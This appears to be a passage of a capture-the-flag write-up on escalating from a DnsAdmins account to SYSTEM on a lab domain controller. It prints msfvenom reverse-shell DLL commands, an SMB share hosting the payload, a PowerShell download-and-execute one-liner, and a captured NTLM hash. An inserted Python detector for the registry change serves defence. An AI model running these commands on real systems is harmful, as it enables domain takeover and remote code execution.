Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ryan\Documents>
On ryan's desktop there is a note with some information in it:
*Evil-WinRM* PS C:\Users\ryan\desktop> ls
Directory: C:\Users\ryan\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/3/2019 7:34 AM 155 note.txt
*Evil-WinRM* PS C:\Users\ryan\desktop> type note.txt
Email to team:
- due to change freeze, any system changes (apart from those to the administrator account) will be automatically reverted within 1 minute
*Evil-WinRM* PS C:\Users\ryan\desktop>
Because of a change freeze, system changes (apart from changes to the administrator account) are automatically reverted within 1 minute. It is a reminder of sorts, but at this point I did not yet understand how it would help or hurt me.
The current user has no special privileges:
*Evil-WinRM* PS C:\Users\ryan\desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
I can look at the account details:
*Evil-WinRM* PS C:\Users\ryan\desktop> net user ryan
User name ryan
Full Name Ryan Bertrand
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 4/23/2022 4:52:02 AM
Password expires Never
Password changeable 4/24/2022 4:52:02 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users *Contractors
The command completed successfully.
*Evil-WinRM* PS C:\Users\ryan\desktop>
It is not in the Remote Management Users group, so why can I log in remotely as it?
*Evil-WinRM* PS C:\Users\ryan\desktop> net localgroup "Remote Management Users"
Alias name Remote Management Users
Comment Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user.
Members
-------------------------------------------------------------------------------
Contractors
melanie
The command completed successfully.
*Evil-WinRM* PS C:\Users\ryan\desktop>
Oh, ryan is in Contractors, and Contractors is in the Remote Management Users group, which is why I can log in remotely. Not that it matters. I can look at ryan's full group list:
*Evil-WinRM* PS C:\Users\ryan\desktop> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors Group S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
*Evil-WinRM* PS C:\Users\ryan\desktop>
ryan is in the DnsAdmins group, which looks like a group with considerable privileges. Microsoft's documentation describes DnsAdmins as: members of the DNSAdmins group have access to network DNS information. The default permissions are: Allow: Read, Write, Create All Child objects, Delete Child objects, Special Permissions.
After a lot of Googling, I found this article:
https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/
I can excerpt some key information:
On this target the DNS service runs on the domain controller. If I inject a DLL containing a payload into the DNS server process, the session that calls back will be a session on the domain controller, and since the DLL is injected into a system process, the callback session will also be SYSTEM-level. I covered some details of DLL injection in the C language study notes on my blog, so I will not repeat them here.
As for dnscmd, it is simple: I only need to run it with -h to confirm whether the target has it. There is a lot of output, so I only list part of it. It lives under the system directory, and the exes in that directory are normally on the system PATH:
*Evil-WinRM* PS C:\Users\ryan\desktop> dnscmd -h
Usage: DnsCmd <ServerName> <Command> [<Command Parameters>]
<ServerName>:
IP address or host name -- remote or local DNS server
. -- DNS server on local machine
<Command>:
/Info -- Get server information
/Config -- Reset server or zone configuration
/EnumZones -- Enumerate zones
/Statistics -- Query/clear server statistics data
......
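The ServerLevelPluginDll abuse described above leaves a very specific trail: a write to one registry value under the DNS service's Parameters key, followed by a DNS Server service restart (the plugin is only loaded when the service starts). As an added example (not part of the original post), here is a Python detector over constructed Sysmon event 13 (registry value set) and Service Control Manager event 7036 records; the field names are my reduced representation, `dnsplugin.dll` is a hypothetical benign file name, and the observation that the write typically shows up under dns.exe rather than dnscmd.exe (dnscmd talks to the service over RPC) is stated as an assumption in the comments.

```python
import re
from datetime import datetime

# Registry value the DNS Server service reads on start-up to load a server-level plugin DLL.
PLUGIN_VALUE = r"HKLM\System\CurrentControlSet\Services\DNS\Parameters\ServerLevelPluginDll"
SYSTEM32_DLL_RE = re.compile(r"^[a-z]:\\windows\\system32\\[^\\]+\.dll$", re.IGNORECASE)


def ev(time, **fields):
    return {"time": time, **fields}


# Constructed sample records (not real telemetry): Sysmon event 13 (RegistryEvent, value set)
# and Service Control Manager event 7036 (service state change), reduced to the fields used.
# Assumption: dnscmd /config is an RPC call to the DNS service, which writes the value itself,
# so the Image is typically dns.exe; a detection keyed on the dnscmd.exe image would miss it.
SAMPLE_EVENTS = [
    ev("2022-04-23T13:30:10", source="Sysmon", event_id=13, target=PLUGIN_VALUE,
       details=r"\\10.10.16.7\s\whoami.dll", image=r"C:\Windows\System32\dns.exe"),
    ev("2022-04-23T13:30:15", source="System", event_id=7036, service="DNS Server", state="stopped"),
    ev("2022-04-23T13:30:17", source="System", event_id=7036, service="DNS Server", state="running"),
    # the box's change-freeze job clearing the value again a minute later
    ev("2022-04-23T13:31:05", source="Sysmon", event_id=13, target=PLUGIN_VALUE,
       details="", image=r"C:\Windows\System32\dns.exe"),
    ev("2022-04-23T14:00:00", source="System", event_id=7036, service="Print Spooler", state="running"),
    # a locally installed plugin (hypothetical file name), no restart yet
    ev("2022-04-23T14:05:00", source="Sysmon", event_id=13, target=PLUGIN_VALUE,
       details=r"C:\Windows\System32\dnsplugin.dll", image=r"C:\Windows\System32\dns.exe"),
]


def classify_plugin_path(path):
    """Where does the configured DLL live? UNC and non-System32 paths are the attacker pattern."""
    if not path:
        return "cleared"
    if path.startswith("\\\\"):
        return "unc"
    if SYSTEM32_DLL_RE.match(path):
        return "system32"
    return "local-untrusted"


def detect_plugin_dll_changes(events, restart_window_s=300):
    """One alert per write to ServerLevelPluginDll. Severity is high when the path is
    UNC or outside System32, or when the DNS Server service is restarted soon after
    (the plugin only loads on service start); medium for a System32 path without a
    restart; info when the value is cleared."""
    events = sorted(events, key=lambda e: e["time"])
    alerts = []
    for i, e in enumerate(events):
        if e.get("event_id") != 13 or e.get("target", "").lower() != PLUGIN_VALUE.lower():
            continue
        t0 = datetime.fromisoformat(e["time"])
        restarted = any(
            f.get("event_id") == 7036 and f.get("service") == "DNS Server" and f.get("state") == "running"
            and (datetime.fromisoformat(f["time"]) - t0).total_seconds() <= restart_window_s
            for f in events[i + 1:]
        )
        path_class = classify_plugin_path(e.get("details", ""))
        if path_class == "cleared":
            severity = "info"
        elif path_class == "system32" and not restarted:
            severity = "medium"
        else:
            severity = "high"
        alerts.append({"time": e["time"], "dll": e.get("details", ""), "path_class": path_class,
                       "image": e.get("image", ""), "dns_restarted": restarted, "severity": severity})
    return alerts


if __name__ == "__main__":
    for a in detect_plugin_dll_changes(SAMPLE_EVENTS):
        print(f"[{a['severity']}] {a['time']} ServerLevelPluginDll -> {a['dll'] or '<cleared>'} "
              f"({a['path_class']}, dns restarted: {a['dns_restarted']})")
```

The same registry value is also the cheapest preventive check: a DNS server that should never load a plugin DLL should have this value absent, and any appearance of it is worth an alert regardless of path.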
First I can generate the DLL payload. crackmapexec already enumerated the target OS version for me earlier: Windows 2016 x64:
$ sudo msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.7 LPORT=1337 -f dll -o whoami.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 8704 bytes
Saved as: whoami.dll
I still chose a meterpreter session; I might need some other functionality, and meterpreter is much more convenient:
msf-pro > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf-pro exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/shell_reverse_tcp
msf-pro exploit(multi/handler) > set lport 1337
lport => 1337
msf-pro exploit(multi/handler) > set LHOST 10.10.16.7
LHOST => 10.10.16.7
msf-pro exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.16.7:1337
Next I need to get the DLL onto the target machine. Opening an SMB share and letting the target load my DLL from it might be much more convenient:
$ ./toolbox/impacket-0.9.24/examples/smbserver.py hack .
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
Following the dnscmd example, I can write the following command:
*Evil-WinRM* PS C:\Users\ryan\desktop> dnscmd.exe /config /serverlevelplugindll \\10.10.16.7\whoami.dll
Registry property serverlevelplugindll successfully reset.
Command completed successfully.
*Evil-WinRM* PS C:\Users\ryan\desktop>
No callback. No matter, perhaps I need to restart the DNS service:
*Evil-WinRM* PS C:\Users\ryan\desktop> dnscmd.exe /config /serverlevelplugindll \\10.10.16.7\whoami.dll
Registry property serverlevelplugindll successfully reset.
Command completed successfully.
*Evil-WinRM* PS C:\Users\ryan\desktop> sc.exe \\resolute stop dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x1
WAIT_HINT : 0x7530
*Evil-WinRM* PS C:\Users\ryan\desktop> sc.exe \\resolute start dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 2624
FLAGS :
*Evil-WinRM* PS C:\Users\ryan\desktop>
But it still did not call back:
The share was accessed successfully, the port and IP are right, the payload is right, and the command succeeded. My experience tells me the problem should not be here, so perhaps I missed something. While scrolling back through my notes I suddenly remembered that a note told me system changes are automatically reverted within one minute. Maybe I need to move faster:
dnscmd.exe /config /serverlevelplugindll \\10.10.16.7\s\whoami.dll
sc.exe \\resolute stop dns
sc.exe \\resolute start dns
I overlooked one thing: perhaps the system revert also removes the IPC$ share connection that was established, which is why my SMB server was so slow to show the target successfully accessing the DLL, on top of the network latency. Perhaps my SMB share should also not have a password set, as is my habit; so I start an anonymous share that does not require an IPC connection to be established in advance:
$ ./smbserver.py s .
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
First test the connectivity:
*Evil-WinRM* PS C:\Users\ryan\desktop> net use \\10.10.16.7\s\whoami.dll
net.exe : System error 53 has occurred.
+ CategoryInfo : NotSpecified: (System error 53 has occurred.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
The network path was not found.
*Evil-WinRM* PS C:\Users\ryan\desktop>
[*] Incoming connection (10.10.10.169,60059)
[*] Closing down connection (10.10.10.169,60059)
[*] Remaining connections []
[*] Incoming connection (10.10.10.169,60060)
[*] Closing down connection (10.10.10.169,60060)
[*] Remaining connections []
[*] Incoming connection (10.10.10.169,60061)
[*] Closing down connection (10.10.10.169,60061)
It looks fine, but it still failed. Forget it, wget works better:
*Evil-WinRM* PS C:\Users\ryan\desktop> wget http://10.10.16.7/whoami.dll -O whoami.dll
*Evil-WinRM* PS C:\Users\ryan\desktop> ls
Directory: C:\Users\ryan\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/3/2019 7:34 AM 155 note.txt
-a---- 4/23/2022 6:15 AM 8704 whoami.dll
*Evil-WinRM* PS C:\Users\ryan\desktop>
$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.169 - - [23/Apr/2022 21:08:33] "GET /whoami.dll HTTP/1.1" 200 -
Well, the file fetched with wget gets deleted too:
*Evil-WinRM* PS C:\Users\ryan\desktop> ls
Directory: C:\Users\ryan\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/3/2019 7:34 AM 155 note.txt
*Evil-WinRM* PS C:\Users\ryan\desktop>
This is a race against time. It looks like I need to work out when the next revert happens and inject the DLL quickly right after it, so my commands need to change:
wget http://10.10.16.7/whoami.dll -O whoami.dll
dnscmd.exe /config /serverlevelplugindll .\whoami.dll
sc.exe \\resolute stop dns
sc.exe \\resolute start dns
I can check the target's time:
*Evil-WinRM* PS C:\Users\ryan\desktop> net time
Current time at \\Resolute.megabank.local is 4/23/2022 6:19:03 AM
The command completed successfully.
*Evil-WinRM* PS C:\Users\ryan\desktop>
Wait until the next whole minute and then get busy. Well, it is not on a whole-minute pattern either; maybe half a minute. Pipes do not work either. Perhaps I can use some automation: this technique is based on injecting a DLL into a system service, and Metasploit has a module for this kind of attack. But when I was about to get a session back via PowerShell, I noticed one line in the error output:
*Evil-WinRM* PS C:\Users\ryan\Documents> powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.16.7/shell.ps1'))"
powershell.exe : IEX : At line:1 char:1
+ CategoryInfo : NotSpecified: (IEX : At line:1 char:1:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
+ function uAG0x {
+ ~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
At line:1 char:1
+ IEX ((new-object net.webclient).downloadstring('http://10.10.16.7/she ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.Invok
eExpressionCommand
*Evil-WinRM* PS C:\Users\ryan\Documents>
This script contains malicious content and has been blocked by your antivirus software.
Now I roughly understand why there was no callback. Perhaps I should reset the target environment. So, once more, generate the payload:
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.7 LPORT=443 -f dll -o whoami.dll
Start an anonymous SMB share in the current directory:
$ ./smbserver.py s .
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.169,49882)
[*] AUTHENTICATE_MESSAGE (MEGABANK\RESOLUTE$,RESOLUTE)
[*] User RESOLUTE\RESOLUTE$ authenticated successfully
[*] RESOLUTE$::MEGABANK:aaaaaaaaaaaaaaaa:21b823d5b1d20b282614012d7e93de6f:010100000000000000c3f99b1b57d801dc0992e0706ee955000000000100100056006700730061004b005800410079000300100056006700730061004b00580041007900020010004d004600470058004d006c0076006800040010004d004600470058004d006c00760068000700080000c3f99b1b57d8010600040002000000080030003000000000000000000000000040000059bd883320297b2e2588ab272c806f552b1114d4c485915f802e15a1c1bb07b60a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0037000000000000000000
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:S)
[*] Closing down connection (10.10.10.169,49882)
[*] Remaining connections []
The commands execute in one go:
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd.exe /config /serverlevelplugindll \\10.10.16.7\s\whoami.dll
Registry property serverlevelplugindll successfully reset.
Command completed successfully.
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe \\resolute stop dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe \\resolute start dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 140
FLAGS :
*Evil-WinRM* PS C:\Users\ryan\Documents>
Getting a shell as SYSTEM:
$ rlwrap nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.169] 49883
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
whoami
whoami
nt authority\system
C:\Windows\system32>
I have root.txt:
Directory of C:\Users\Administrator\Desktop
12/04/2019 06:18 AM <DIR> .
12/04/2019 06:18 AM <DIR> ..
04/23/2022 07:11 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 2,483,277,824 bytes free
C:\Users\Administrator\Desktop>type root.txt